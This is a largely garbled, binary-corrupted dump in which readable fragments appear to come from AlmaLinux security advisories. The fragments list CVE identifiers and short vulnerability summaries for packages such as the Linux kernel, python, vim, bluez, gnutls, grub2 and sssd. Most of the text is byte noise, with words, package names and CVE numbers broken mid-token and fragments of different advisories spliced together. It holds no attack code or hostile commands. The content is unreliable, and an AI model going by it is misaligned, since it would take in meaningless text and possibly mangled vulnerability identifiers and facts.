!��s�HTTP, F��eLDAP�>r���0/2 push h��g�-��239����l-�t
�s���c��,��enh�
���x��d�	ib�~��i�=��%���5v�+�������7�^�N�;��pa/���
��.�H�
#���d_�/�{,n�\�6345�(f*f���	��_rb�;(skip ��
v�/
����gc�z6581�I�;t_li�:�"����figu�I��I%e�lge�g�d6��vfio/pc�L�
� e�hINTx�s�p�	1�
����._brid�V ���	�%/�*�*so�!�x���o�*p.�^�%�^�r�mut�<�
�}gc��q_�ͫ�ab��
�>�e25�e�%�
-�#�__�nexpr_�l�u!t�7��$c�;�b19�b�S�c:��i��(p��e�\�H6�H��:��rm�	cas�3e��pa�,��m��tack�j415�j�+l��
s�v�f!����A����a��
3��x�A�~�
��di�L"r�� ���
g�R*���ba�$h��#on�l7�l���� �y4����ec��n�O��co�c'�O�X��]�I96�v�a�LAG�J�)�de���Yy�Y�*_vf�00��
���� e���T�<v�;r���ҦZ�77�ty��_gsm�x� CAP_NET_ADMIN�t��h N_GSM0710 l���X���hqla2xxx���z ��&$�_edif_��^�* s�	���-1netif�d �/�J�@86�P�0bcm�.��ar��me�_+�A57�ORDMA/rx��eg�.in �_�=_�ue_pkt�J4�c
�+t��shif��d��[�#in�*qp�_�c_�a_hwq�a���Xx�m�(�re�� have�~.e��e�%�l�:yt�X�-&d/raid�2.���&����%&ai��itself�Q�Cr�,_SB_CHANGE_PENDING�o9���\��k��#�fib6_d�41_pcpu_��O��
�b�?cfg8�61�_wi�k�R���_�e��O�,�ac�O�����eee�Rs�&ps_���9���^�[�'hug��
��1n&#39;�5��s������6lio�O���iwl��v���8n_�^�r ��acce�� ��Y2�u�^w�Aio�\�	��
��l	�gi�_/s��
�� �{3��!'�h�������$p�ۢ�mfua�	�J��[4���ܶma��%�����*�NF_HOOK����End.DX���6���5�`�4��0�/����}9� 2fs��
e�R7��'ip�@+�N)a�j'���'��do�V���)��-��tap�5_�sh��1�'�	 :41���Uun�%U�u��$S�)SOCK_RCU_FREE �zl�h*in�!_�S���/,�Q�NFSv�����*��	s4�W
�_label�N����ntb�C:��_�?�()�7�u�����__��o�f�vm�q�N-���,�:o�I0ctrl�q� s�	ish��c�v�7���3���<�!����6��+poo�0�
��POST �/i�T�v:�oxy-��3h�/#z��	�6�����I(d��cr���e#gi�2d�=���1��s$c�t$�em�R��doesn'�*�i:quo��	�k:l�
��0�,�U��n�h�6�a3�gKerbe�Q�i�r�g ���3�=�|�Gc��m�0�o���y�;�E�
e�)n����n�-�o��c�
	��+�s�8ds�/�/�J��n���ed ���0,��s�5�T���
���|0e��
�G���ahelp�y� u�-thir�M	rty��#key�Mce��	(KDC�mDkrb�7G����*t�Y8��
�$��3� �Bub��2. (/usr/bin/b�)���"	�t���l
�r�-l�g��:�d���
�;s�Sa �li�l���4n�,s�	�)��k.�!0�if��pa��A�+���s��0s�s�&box�����Gp���nt= (--���4��9��G�40�L���l�M�� (or�	���-�����l,�tC���]��_�0�-GNOME��m�qlo�w%�X:,�n�*�?�j<f�"������ng��c�-�s�6�H�1g��2���9��5�4�
�D8����4�]5�%�Z�C�S"f�RO���9u�/�Q�3
V�u��m
�i<����*��3�afsd�`RELEASE_L�{
OWN��C�����0m�[*ch�i����D�'�Vlk�S�
)�.�$e�l@�5di�*�	5�.1 wb_dir�
����g���b7���REa��
��B�;k�{)s�_"�*copy�_�"�*�b��5n��:e�B�d9�h*KVM�i�Fl�cp�s�' kvm-&gt;�o�(�Dvm_�Q�e�
8���"�&��� �>m�P:s�>��Cc�S �Z�see��R� �RDRAND�CoCo��V8�J%�=tlb���LF��&;���Nv��;��S��i��uf��F�P����do�as_i�k�spli� 7pt_a���S�\Gn���-of-b�.s���ops�ê8���m�ap��_�Hc�7in�&�_�'�O��xusb-stora�ealaud�:C�G�\�A�l��a�O�,86���ms��$�=Ÿ9��V�c-En��Spied��6��� �N�ŗ5�+xh�H�t
�ED���Ѳ=�%��D���O�-��=��$�[�	�Bi����'_������]��E�T�����I��a��h�F�����7��lai��-as-LCP but a��a�O�C�e�"��V�{�#�>�Ln�0�t��<_�4_���}�BD/MSI��Dmsi��0p�@�(�6�7x�6��"��
WARN�gx�.�{�_mo��p0�00����.p�r6��g�N��ro�%��JƕRe�
t ��4;�2��I�s10�o�6<�!���N�B�%t�.�'3�J3���?�L�pK ���;R�3y�)$���2�[Expat�
C�z'�'par�-XML�cu����;e�H:�*<ga�� L��P�FV�wCin�2�R54�y�NI�#O�#��Wra���e�;1�;��#�-�
��FL���&ki�����-
�l
���o�L�]:(�:)��T�\1���(TL�:t�A)��a�g
ll-�D����Ural-pur��e��g����W�=�~G��&�I�X.509�V��~'1��%v
u�-��gQ��yO�k�W
��#��a�JPmirr���'t�r�b�	�'�
we�	�*y�s���3����7�dAR�9��"/�f�'�i��>�
is�B�>or�-m��F������"�:���v��c�=�<'�K�X�K�_o��ha��vp�F��X0�Xfc���E��f�i: d���?(�%
�vma �ql�	is�����P'���
�)
��hD��l��%&��(�>��P/pf,��M�;P�	�� v����� �_���I*�]�v%�	�~$�����V�"0�KSe���*	gpio����T�w�~
�w���_�2Ied�a:�Y�4�Y�W"f���;i���	���fPal�A�����&-�eC����L�;�����J�r<���$�cppc_���W�J��<�P5�O<�b 2�H�&(g����o��hQ�P�N�!nl�#A�=��Gc�I�U�9.�Tof ����K�+.���g�'I�'�y����%a�5V�'�����o�</��<���f��&�ACPICA����
I�\�m��BAR�uHY��K����.��}!��#�_$�3E�i1�ht7�V�*�tW�@��_�4=422��',�dnr�"Re�EPERM���#�K�L	�xs_�oJ�0��L�X�j��D�{ l�uqFhw:�;:IOMMU����"s��r���
�y�^a�ps���F�$��
�O205���w �xn�}+��f#�t<�ASEV���k�AC�4�p�F5�+�$�
Lo�C����-��u�_n�Dl(R) At�s)R�����&3��Y7�n�>2�_�&,�	�w�x�&i�J���H�gL��C274�C-��L�b[B��e����ch�r/�����4c�Q�cy��3<�s'�o;: �p;�Fo�2�#rmm�3C��z\CPU�g:��9�	9hwm�9w83792d)�[��2�����u�b�5ry� ��K�::3�[A��c��9e�9sn�*	x����
�����������_� ��
OOB ����!_t�� �
�(���9Y�Q�c�R��t�-�Om�L�2�[85��:�J���vNMI + ��#�/
f�s��xr�6$t�4���:�~=o�?]��
n��'��_�t395�xfrm6�
p6_d�C�ա8re��n��D�b�+��,���R��
�	55�%_�_��
�Q20���ct�R*ke c�5f��d�}�p���cTs_ht_�q"�W��Y�W�*R��n��'������ _�)��2�_��on�Z�Z��e�6' �	��3'�D't�:i�<ReDo�b���ve��^�V�-���+'�}�T2��K�
�v�U��.
�����Na�Bran��Hi�y��(BHI���a1�.���+san�q�sto��3�J��A66�'�&���re-�)�@?tale��"��:8�e�L �aW�vg�OPag�6�
>or��K���U�p()�T�)á�75�.���6ec �I���G���Z:�n�-_�(�r�}�b��C�4���w�6�H�Jc�0h��,��r��?���W��X�(�F	��9�5�
im�(bl�����"�N��0r��U<n�+nimum�o�Lr�/i��t�Zt�=�qf����C��x�i#�kog ��f�dU���N�F�l���8h_��8�fI94���@inn�9��a�h�[��h�BŷUSB:���Dc-w�M�~�
�3����=�o����jV�D0�Z�T
�e�T
���~�6��L�)rt6��L40�@g��O�;g�h EA�B�"�A#����#�3��V��G��d�og��sk�-��op�<�_�;�&�0
�Pinf�W��o�Zcf�
r_���[8����
n��`�c�+7e�S$�__��P��l_���
i�k���K�|�(c�b�_�gB�$���P1�TJ��� 6�D&�:�}�������Q�V13�V�?�k�g�2x�
���r�_�X�R�:�u���a��J�p�\��
��5�)
�/���n#�b�:�=�1?�qse�����_��O501�3G�[�!�Y
n�d/�"�lm�(s��d������tte�$s�k�J�����:�.v�!�avail����+���"�+�o���UE�n�]wi�s�tmob�x
�gadb��(WWAN��!�PPPoE���#�:,�TVPN�g���a�Aet��0dif�Ft�+��I�d��~S��765�	�V��Ad���C�bs��֤��n���'�Xi�	, se��i�RN�3�Ye�*��Co�#kit�0bb����/�2d�s��GNU/�`��Ia�*b�Vw��m.o�s����E,�in�&��gn�	��
re��
,���itr�V��9o�-��-� s�*
����vc�����2d��0�3ki���������pam��*v'�*_�nv���1��@��8�5�
'�V5M��<��/�/�e/l��e�/p�_rmt�H�Z�Fg�pi�k5sealv3�N�S�Nkdc/ndr�=2�B��'�
��'Un�ed�4gr�h����^8�[��v1.3�t5�D�UE��y�.nt�DSA����ZB�06���s���
F�v!���U��]_��A74Ɣ�-se�A�0@xt_�k��e�Z2�B55�b�KA�ed from the References section.
Python is a�nterpreted,�a�'ve, obj�2-orient�Tprogramming languag�%which�8clud�emodules, class�excep�y�very high level dynamic data type��d���l. ��supports��fa��to many system call�Clibra���uas well��.v�ou�indow�̤;s.  

Security Fix(es):�  * p��: c�I�*t�?o�� a��lic�ZZIP file�y��ad�wDenial of Service (CVE-2024-8088)


For�Are detai��bout��s��issue(s)���t��� imp��,��CVSS sc�G�
cknowledgm�Ū�o�/r rela��informa��,�f����R�� p��m�Os�,�W�(Addi���Ch�"es�?�֤��n �c�'�X����eas��see�jAlmaLinux�t� Not�0link��Th��icrocode_ctl p�a�p��vid� upda�Yf��I�bl�,AMD�+�Wsor�$kernel: local�5iv��ge es���[�w�(R) Xeon��3-22655)�^L�^�Hdisclosur�MAtom����X8746�Xi��ome�]�U3857ŮPossib��¬P�N9368�$��KD©with�"SGX due��Morr�9�Dcu�������43490��i�K-�$: Ra��con�
���7��45733�QUnexp����behavi���U�PC��(TM) Ultra�_6103�Fc�mgcrypt�wy�^s gen�(l-purpos�Cle�(��s�
��A�dph�algor���
��{: vul�l�k�^Ma�dn�t���m2236�B	Vim (Vi IM��ed)�c	�Xd�
�8��	s��f�Pvi e��or��vim: heap-b���uf�B�flow�il�=��1�G�H�bluez�Y�����foll�e
ut��ie�_u�	n B�9too�app�>
���ci�l,�a��h�
�Yfig,�p�6�l2�$��tart��ript���)��pcm�J �Aur��
�]�	q��: unau�
riz�HID�n��Pn�s a��s��Prok��j���arbit�comm�s��v� �	86��Z: A��o���TAVRCP I�Gp�IV�vd��f Arr�sInde��m����E�hV�!�	7���v��p����ook���Q������r�t�/��v�t51596�tOBEX�D��-of-���,r�I���`4�`a�L��avrcp��rse_m�a_��d���2z2�ze��3{89�{�m_�m�Qribute_�s�4n0�n��s�y�2(44431�^��0�`t29�F��-dns��s�8��|���at�
s�NDNS���������3defin�Zer�	symbol��
c�&ta�Ju�)y�P,��ch�d��,��@�d�op�=�	�&�d�hs�h��tub�Qsol��948�G	tpm2-���ps�5�(set���	��"��+�z��Tru�P�;�� M��(TP�2.0�s��us�Msp��9��:�qu����go und�'�y�5_check�)�Q4�Q03��Zpcr��l�	value� not�	��W��P�e��T�CGNU nano�
 smal�f�dl��ext��
�E: runn�p`ch�`�K�own`�̢��2��e�2�;���Zrepl�H�-�rg��y�U�#�o�^��6a r�-�k���-�A5742�B@Bub�rw� (/usr/bin/b�� �%�eng���un�%d�er�Eworks��,ui�vin�n�
�����7�R���2f��pak�
��	���
�
s�s��box������p���nt= (--�)�c4247�d�5"��V:�cDos�a���
v�D��tr��_�"le��
h�
���!s�\623�[�	C���UNIX������S��(CUPS�]�@a ����p�*lay����,�I��simila�~
pe���cup�F�ppd: �
� �����k��r��ed����PPD�v�Kerberos��net� �e����\��c�.�����
your�E�?
elim��t��n�-���_��n�p�*�8ds�m�/�J��un������.��Z�
���

�]o���,ea���H�
help���x�x�<rd��ty,�"�#���)�X�ce� (KDC)��re��diu����g��c�3�(�RExp�Qs���y���XML docu���6�>e�N: �DoS���C_Res�CP��r�
060�B�	�T�u��	�!���	������l�|�t�x��p:�g�
al��m�eld�d
dump�å(��422�m�Si�euf�uRequi��ri�������a�l_inv��e_��	�]6824�]mptcp�|�7�� uaf��__ti�U_d��
�Jsync�F58�)&p�|	/aux�sAUX����0�<�q71�RDMA/bnxt_re�Ga�E�+	���up L�(
-2 PBL���M0�?!mlxsw:��'rum_ipip�_me���$k�ee�6
�e�IPv6�r�4�d52�uc�> ���?ub�c�a��in�&_rcv_�_adju�5312�r�d��y �b�.e�
��.y��*hron�Y�
�R$l�Hr��ro��.�9
�.�Y��oi�a�Rbeca�t�only�[�if��in��h��ad�whol��. ����lso����mirror����L�K�dfo�㱓��U�Z�td S�%Cont���71��5�7N�zM�r�8��
�����1�>s�����,�^mp�{
o��ep ���:�.v�!�
ava�Y���^
s�p�������UE��K,��rel�0,��b�broadb��(WWAN)�APPPoE��,��	
�TVPN ��g��	�et�d��t�+��H	�m�Hf�oRout��m
�Kt�Bin are��5d�rea�[a�Al�2-9.5.z] (JIRA:�X-730���i�U��er�Wsto�in��u����#�s�i�e�ipv4.�'e-�%ڂ1�Z�y�do���@�\��-r���qs�g7�g��3661 ���
H�%��op���D
�Gipu�M�����^���8ff�؊6��8�h
��/dc�Don&#39;� �	p�K()��eqsk_queu��	n�}(�=
�j15��	arm64/sve�^i�h*�
�c�CPU�	te��ha����S�t����)i40�Rf�r��(�{�n�Al��'�n��te��x����,��#zip2�Ca��ly�',��-qua�
�#���>	�J���bo���dal�c�'�p��de��4�(�h�E�Y�h�'����#��:�D���x����T����(�hd�-���il��19�900��)�!T�! �'�*s�Q� �b��e�p��=0�S5-�#��PBy�)�O�*�Q��o��y�m�k�(o���1di�.�	
�O
718�kE�db�}�v����_5�P.�i#�EA�w�Le�Gt�8�~l�h�m#�S51��K�&���)�
���W�/���zgets��1��'J�	6�Oc��
:�ke��RCU�At����igmp6_�
()�|2175�'�Oovl��UAF�9�_de��y_�,�nv�Z��mov��dput��+�_up�d887�d�&atm�i�af�[�!�H�!ɬ200��udf�s�R-o�'���in�*_f�_��X2-498��2vmx��3�al�&�a���iz��in�'_p�S1_xd�37799����p��#P�Tra��:�b,in�+�*�=�,�%7�,�Ijq�l��twe��nflex�6�Q-l�!JSON�E�Y��=lik��d�F�"�
. You��:/�sl��,�,��p,��ns�� s��ctu�O�Q��s�{#��!�Zs��awk, g�w#�D�F�/�R���f�� $�-jq:��ha�-ig�#� e�&+�Wjv.c:jvp_a��._���2333�h�OA�Sa�z�N�o,�j-�Xq_fuzz_�"�Sj�qt�_vfm�!��8�#���xml2�
��d�hop�� ����"�a���5���"��
����{: He�$�(�z)�<�D�*(���97��/�WTy�Y�fu��L6�L��
I��O�3�BuildQN�,�OL�b�tB���1�o�k6�{4�)�	x86/�:/�<��	�	����-�p NUMA����	99�GL�.�=�s��
����b�<k�
������mte�MC����	�[���-GNOME���%loop�D,�n l�;
 �,�un�դ�����-�V
����xg��:�1i�_��_ms�o�Y525�}<�?��Und�@o��rth��	�&/g��.c��� g�[��"rt��icha� �����g�j�
vc��o�: m�s$d���po���80�!�Fsunrp�b�e�C_GARBAGE� �svc�*$�	��i���

8089�:���dou�8�9�t����79�6�Kw�'�<wl��k&���d�c��,FW��!0�� �8 5���M_s��	�|����i�G�'4��� �s7�_x�7�:o�Cd�'��_�x�*12�Zavo�&-j�j'na�sb�~=��<if� �
de�:y�+�_��!���-��	-���r��/�;��
8�Un�s��#d��fsc���v�B�5���u��}mm/hug�U9m��oder��>�E$�$d��N�9�Z9�$Ų:�"9�������O.�<mii_nw��re�<�+6�Z/m� :b�(�eo����
���
�P45�7/�%
�y�a11��SQL���2(�7n �(�(b���a0. A�qub�t�&92�N�<ed�%�����A�!�a ��sk�.��!API�B����*v��ǫ�e��s���p	���N aga�\"������enjo�&power�J�E��n���
1�4adm��st���h�<��"f�����g�x)��D���ql���5
T��3�s
i����
96�"���rn�L�|3�4����Uni�%GICU�Q�Er���
ull-f�b��7��!�{icu:���
��SRBR�5::�Tag�
�52�T&�m�sl���U�A�F��� �x&�"at�rrup�.��A��Pt�J
�6�2�"Wrequ�1 �-�; ��H.�(rc��ials�*��9URL�-708�*��Ski�C�Ifr�y8�g��U�HVS_UNDEFINED�ӡ9�~C����+��'�p�� �����y�44e�Z�2�/��G:��l-ish-hi����y�[�$tp_�&_�.ve�r928�+_�Y�ccl�b���)�5�W�[8���Ee�{'�"u�oF��`6��.��-5�3;�x�{1b�D�q���n�'_drv���e2�/�e�'/vmw_v�I���:fo��i�ci_host_do_�m!e�B_���2�78�
�p�Pne��as�
�Q q�G�i
7890��
ti�Z��� R���%_a�_e��6��ne�]80�\0�]���^ �ztap�{_�	_��*�1+�7�nO�8*SSL��	��	ki����=�>�o�� s L�;:(�:)��T�.��+��m(TL�:t�~l�������`
�jth��P��Py�
��o���
�FC7250����(ke���L��c�H�
�,n't��rt���*S�_�%9���T��iV�����{��M��B������241�!	���;b�;�S�maIDCFillN�^T�n6�N�gcc�q���[mp�	r�C, C++, J�/, F�+�, O�z�!C��Ada 95 �H�����3�0i�
�j��Un�@?�O�<�~
> ta�r(HTM��9s�3t��!OM�j$�3�,hod��0-��2�N�o�:�O
�XI�y�t%N���}�g04�	��[�������K:�\if_��h -����_�p�i7�����P���# 12k�#���&����?�G2�W�'�bpf,��6_�����_skb_pkt_�1��8�=;�'�d�R�!�'�$G c�xI�l3��2895�U� tlb��[�8�M�Y<�V�)(sp�,�<bef��34�Y�b�r �P _�f��vs GUP-�@�D:�P�!���d1g�6@�!se�3�>+pu�fE��qg�Y�S1�D�	rtw88�[��'��'�C��"to�:"�R ����Y�c�Q3��]�]_�N����	� flush���z5�Ai2c/�Wwa�C�
�@���P�H3�$t��Tl�!��
f�!�/�c<�"��so�rI�L47�3��	ar�v��]�e
�p ��6���$sev���@��a�7�K��s���LT��",�s7io��ISO 9660 CD-R��im�. L����
�#�{��y��bsdt�7)�(*,�=��_����R�ws �CY��Y�񤄦�po�H�)Sskt�*�
9�?��R��>�at�_�9��_�Y_�^Sk��?6�&�K
�..�U59���%��D�5������<�K.�p205�)�3�H��t��Yi�$����c�_@es�A�=O�X
�Hi��$scen��
���:�' ��u'�I��J�/������8�z���7BMMIO �'�f���}(�in�1��e�0hw�0���)iwc��L�a��F�Q!�	�4c��J�@A�A/�6�b1�H*�]A�6��=�Hc����K��b�Aes �UG�U3���� ���n_��%46�Bv��K�6�P* TOCTOU�:��xfrm���!�y	�?�L�r
_�4*�=�<�i5���AC����
e�3�3�1"��@�;81��6�:lugg�$A�*VM�!c(PA�`���Kto ��up�bVpo��$e�g�nee�r�E�� ��E���1�H�
�	n�.Ipa�L�
��A��<�6� �<In�L,�Qf�|�0��94�*�%udma���a�����+����-�Q��0��dp�Xc��-rt����Y�4mutex���3in�]7���+Gdrm/vk�]$u�;<��|
�eit�5�|3��%scs�	4pf�}Us�i��b��BIOS�p���s]�F��!ix-cpu-�L�Yi�#Lbe��?�jL��)_�)_�)(�p"��V��3��#��f�`�"Wr���GEM�s���(���4��m��7@^ 
��,�5B^N�P�~8�>���Ң���Fp�io���U>�Zo �o�>���583�
�d�Y�I�a��p�H��b�R�?�@ 
�=
 
��HDelay put�R6c->i���mld�ޢ�H��55�B(Qgdata types and dynamic�ing. Python supports interfac�.to many system call�Clibraries, as well��.v�ou�indow�_�;s.  

Security Fix(es):�  * p��-cryptography: NULL-deref�nce when load�WPKCS7 certificat��(CVE-2023-49083)


For more detai��bout the s��issue(s),��clu�]� impact�� CVSS sc�G�
cknowledgment��o�/r rel��d�Fformation, ����R�� pag�m�Cs�,�R��s���:.
T�gnut��p�w�8�rovide�4GNU Trans�� Lay�i�c(GnuTLS�h��y,�?ich��le�� �o�algo�9hm��htocols��6��SSL, �R��D�	����: Vulnerabil�nn ����tool � p�:��rs�~��5-32990)�NSCT extensi���J89�J��Name SAN�T�_�I8�I�� po�< ��T_�$_figure_common_cip�dsuite()�\6395��Bug�Q�oEnha�P��(�3dBZ#235962�+`�F1�)\�E2�<X�X7675�U�kernel�con�ɤ4Linux�!,��� of ���op��t����K: net: usb: smsc75xx:�Omit��et length��skb->l��53125)�P�Kdwc3: gadg�^check��at ev�K��u�do��not�*ce� �buf�G�v�7810�jdo_c�;ge_�(�ܩ�use���
�"n unm�oed/�lours �s�]8498�]s390/sclp:�<�$CB�;es����>9694�)�mm�ig��: f�n�8�D�"orr�����pp�d�N���7��24�^�*fil��
f_�sntr����crash���iremoval�tuninitia�ٺϡ2y�c72�cmb�li�*�Y��-af�v-fre�cifs_oplock_break�Q527�Qct��line�
ze�\on��gso��s�T�%_rcv�K71����h��l�A��zero-���ords�d�{rx_���8��io_��/fute�l�uure��_wait��cle�	 up�	��ly�ef�¢-�y8�)��/key��slab-�<-of-b�)d�3�_task_�fm�I�p4-50301��KVM: x86/hy�2-v: Skip���
a�ica�^
dd�Ss����PV�B flus�835�_w� 
: ath12��Decr�D
 TID�+RX pe��frag��t�Jerr�%���E761�Eiput���Fbas�
���f���o�wa��work���I�
G�o:�x��
g��ov�nlow�f4896�&Vim (Vi IM�ed)���o�d�h�z��� ver�*���Pvi ed�s��vim�h�gpa�|
ra�F�.�K5�	6)�,i�-�*'HID:�L�
arde�C32ton(��g�~s��n���0 bi�b55���T��pol�
F�wemi-un�r�r���f�D614�DALSA�v-a��o�	��� UAC3 c�H�bse����scrip��Ü975�I�D� qiv -���6e EBUSY�	�
l���
37��Vssh���b�a�=SSH�L. It ca�ee��	d�{�.��	��serv����l���r�B��: ��
��sf��	���l��*	nfsd�`n't ign�U�^r�Frn�ed�esvc_�c_reg��r�2���firmwa�Darm_scp�E��_�9�y�a�b	gn�!�9�h�\f�Ŧd2�w	08�unrpc��ys�Y���zale��71�K�?�ƣW�K6��fi�Ff�*���d
�#_d�pa��81���
cfg80211�P
e:��p���
�i�Q_�#��
�a_�v
ult��`49�csi�O
pfc����
/���rd��cd��r�eiv���]1�)�ipv6��r��MAC �#is�rb�j�ant-tim�:70�����UAF/GPF��g��nil�~mdt_�)tro���l36�%x���#4�+(�� l�
via��
���ex�@�v�so�AMD�Hc�r�	4-3635�^�4U�0�v�jap�Add�7di�\�IBPB m�
g���4�_�*��	: �)���pot���%
C��$���p�xra��0�)�'2��83�,so� q��imd-d��M�sha�me��y�kWC,��WB�&4668�wSqu�c�san���rsymbol���k�~ze�F74�v����b��een�wice�lo�����f���()&#38;����]�kŤ��td���"in-��MMIO"�$�@72�rx�]�>aĢso�}s����I/O��
c��4-�6��i��G	we���r�
hedule�y��{��06���Mm_�pc�dd ��H�_cl�	_�(�I�?in��	/�1e�� d��	�2��posix-c��'�d��spec64��n��_�)_s�=m���1��~�V�>�cau��_��#!�M29�o/rw�s�SNOWAIT���vO_DIRE�u��#write�[305�a�6
������4�P��ir�%/v�K�dc��_queu����E�G11����VMX: Bu�0I��l PT�_u�lz��gu�1/ho�m�H)��hi��CONFIG_BROKEN�j3�xe�PX���3�t�]�Ysafe�j��ul�vve�t�I���6�Advis��4��s2�
�sRDMA/rxe�"�sqp��n���req�G2�&b����af��Erq�@l�Pt�tags�	7��
�ease�i
�Q�/�
o�8i�cu_�Ĝ16�N�af��do��Z�? d����sk�in��_�i�G6603�k-cgrou�+�R
�@�cg_un�E_on��H7���nfi��vm��oc�#
R��)_�(_�a
�T6�Tbpf���.	����ch����g/�Fh�RCU��av������Lj1939�_se�_new��Mkb�2� ��x�X4�X�Up��XC�	� l�$di�\�=%pa�
&_���+el�j�-��p�*�+iowq�kill�2bef��:ƾ70�	rtc�H__�_�_�was�z$�-
ful�Z��r�����'73�j��put���
'�@%g���M&�is �5�
de�O��	�\8�*ig��/�"	inv�T�����	gb_��_��ul��233�pv�u
B�?�4zed��5�`p_vs���f�k�d368�9���mp�?ximum��shtable�C	��INT_MAX�Z�164�!�2��Hk��d������,(�bulk �Nai�=s��
�u!�a�	�D, bfq�'wak��q����_spl�v����R3��z��L���K���0��B��~��g���r�@	����M��� zswap:��synchr�ze�\�c�	�"�@�	CPU�\t�Qlug�c9�ca���L�W�D� ��ics �������U�����d-wp�E/P�
�U�m#m��	ap�9�cpfifo_�
_en��� �8�
et�ȱj�t$�$==�T�U������|	��in�c�K�B�o
6�powe�
/x��H���$�Jicp� a��O4������:���NAPI��om d��3�iuc�9���9��papr�>�����{	s��s�'0'��d���_353�v�	���|������Mima�J��!�@���N6�0
l�/d���Vdi�3+by��L��	 DIM�D���	�\�s��1�����b�
œ26���a�1����ra�#_m��	u�î4��/�x���%�bmap ���>��B�Oe�1D�
��G
�m-��UEFI�Le Bo�)��
T2��c�
����8�X
ta-��ar�$ ep->rdl�%#�8����J
h�)����=�Ll�.�=�In�&:�^ap��-���$�aen��p�-th��gh �,�l4��NFS��L�#���4_shut�#/n_�b���F���Se���a����p/��A	!p�m���72��p������_�:��_r�6���Y44�Blueto���trt�K����+in��up��	���	79���brcm�c�T��
 r��)�c�Wwl�nhy_iqc�}�!��
ms_n��d80�&ûbc�@���},���_�z(_bo��_na�C7� .�W�=mlx5�P��ic�ODP�	���&�Ɵdrm/xe/���PTP�
�Uk���495���hid���ma��Q�����_�\by�{����	����j��rtw8�
�1��c��.l_hw_s�����le�/	7�X�`mt76�925�g��ln��,vi���
798�`�I%�'���x��
��F�h��OPP��i�� x��]ert�	void����$
f���u�,ı�ad��tin�&_�[_�T�to_v��i�����	acl_�/�
��a�B�m��<�B����H�Uu�U���s�)���`�r�7�7�Vs�_3���C�U
P�p���]�8���u�som�(�T1�]� ����b��sf�����.we���\���E�%he�e�������r#����o���hR�l�M��ip����.u�|
�>Log�c(Co��]
���E:���g�re���d���?vrf:���A��u��l3m�l_l3_o�W��fte�
b��e�uEAM_OPTION_TYPE_STRING ��&���]�0xh����w2�
���w�p2�p�Z���3ūvxl�O
��_vni�� ���u����off���,���17�c����6��ip6��_ad�s�6�ASoC�OF�[	t�hda-dai�DAI���1��8�/�®�?��L�G @��T'�?b�8���ý�X�
l���.�[.��weight��ways�<�+��-�L80���l��un�%�_buddy��j.����
�4�颎pm�_p_�bw_*���
b���X��(���;�a6�1iw��mv�a����O��d�
��'t�p���'�@�(��ac�"���1�up���STA��8�
�Ex�y	�2��ify �\��v�6i�/���kv��	vcpu�7
8���1�xs��j�
�Is�Vof��eld_�&5�����4���O�Zs��p����so�
�
�H����.��$�c�]��!�ra�
�������a� �v�h%�V�L�8�^
"��xe_��0up+0x12c/�70 [rd��]"�
�u�a:����DR6�Q�e�L��y�e���|.��_ru�*lo�S�f�*��_��� ly��py SQEs at �z�}�W��!�6soft�|��L
r�0_�u_�	�j64k�_�9��0ibmv�0���l�&�	sen�!o VIOS�O��A4�N"�n��:_�h	i��&_�m�ed_�)%d��
��8�D �	�+hol����z���3��m��!�8�h�E���-i�C��c� nul�f_i�msg_�	Ƕ�tc�Ad�T�"�'a�'#��!����? ��r�?��-dst�X6��d�s��<�� �r��]��Mt:��, las�6��U���7mm/�;8�i �S�;�
f�."o���� LRU�H	�5�p�I�X6���,��:op�+��6�Tfp�F�fp�!��rl���1��8�M�t_�m��Ngene��opt�)B�f�� on��ƨ20�����o���a�� �@hea�*��	�8�	���c��disp��������3��
������	��+1�4��j�5�$�ke_�k&�C$(�B$x�i�m�
LSM��S�c3�
��& �Y&A�=�]�js�p&�֤��n�\
�'�X�	�� ,�W�Alma��&R�� No��ed��W'grub2�V'p�PC�22�4Gr�Uni�	d���a�GRUB)�Yh��n�@�n�5cu��m�٢b�:l�:���'r�
�e
�". �����E�b�REety���o �.��f�,"�`E,�&u���V��h��P/�L�K1�!:�-�5/g�bx�g��
�l����He��OOB W�.��457�h
�C��8)�D-��8�;�1g�I�*�
�QUNIX��w��Fs��P���,��G�9ana�&us�{nd �����.�9�:�:�*��|�g���n�_�W�L/etc/lo�w.��2 ld���Ǻ	romi��4�!433�A�SQL�	�6C���
6�{�	6���(��b�`e�/)�'A l�~�et���&92�#�ed�%�e�A�!to�6,� �]�*isk���P�Eis �9�$4�ni�N����of���i�q6����Q(���enjo���
w��flexi�L
�-����kadm�[st���h�p���44���sa�g���S4��sqli�"C�T���i���I*�sH9��8�8�k�=S���:S��i�&Daem�i
SSSD)���Y$��6�d�'�P��O
t��E��W*ori�7n��uthent��!�sis�OI�2�XE�g���L��S�c�NSS�#
�!P�&g�@A�[M�C)�/
PAM�.0t�Pwar�<��i��J�-�E!�#�-��8��� ��f�[t�� �b'�vs��] ��Kerb�!�3���w�|�$leg�s��AD-joi���3���115�COpen�WP��Nki���;�=�d$S��2s��P(�:�0�Q�Q������
a f�6-�B�u��--pur�O2e�Qy�Q�o�������&��RFC 3�� KEK�awra�}92�55�'�6�}*slub��,�5k�K+�|e���,_� �{�|�A���Ds���
	�
�QXML�cu���Xe�K�� �	�w�^���Z3�U ��rig�r
���mV�/�(s���q�1�����b��+��³�937��Vxml2����d�lop��box�?����4f�|W�����
xsl�ۢ��1if��e �=6a�1�&Dyn�9F�J�rf�in��"/��.c����&�'��[%�,��P�)_l���X0���\*��#i� Bn�OC��7�A9�
�"B��fOm��,�!�1�e1000e�Dh��&���_eep�Z�J��&��"�N��,c��,u��$�C9�O��Cl�&t�/sk(sk)->fa�@�_rs�(��?�
��9�R�)*MGMT��7s�~+�%s�?�$i�=$u/vt-d�is�K�Vty ��%i�coh�
����l�^%40058�X����%p��r��xa�mQ�Ԥ�.�6P40���pd��������
�r����ha�d-���v�r
V�7LSB �!�>J��a
gg��O�D�7�#
 ��@��R]u��O��=�RD-Bus act��E�����<�H��
, o��"�5]�&�#��
�fk�xs�e�p��es ��<���������*^s�,/s�h4�n�y)s�&O���P�3,�Ki�r�XW�2�7o�
�����ilabo��� �	�depend��y-����r�)�!c����(���-���
la�X[�Yysv����
�5�d�p):��,c��5��� 	 �cl�(	�v�Z0a SUI�l!�8����.�1�t�K�G�\�W�t�5�+�S��} NETDEV_UNREGISTER�%if���+����Z�v�/fs,���<��]�J��J�HB�(���W�T)at��2�H(ke �-�'��h�CAP_SYS_ADMIN��r��)��n�49� &��f������#��Y��XP9�L�VX��W�
��$�3�D�i�G
�Lls_��p�"�{$�'��76�L�d�L�pre�4,��#e�	b�v)-�n�R�^m��l�
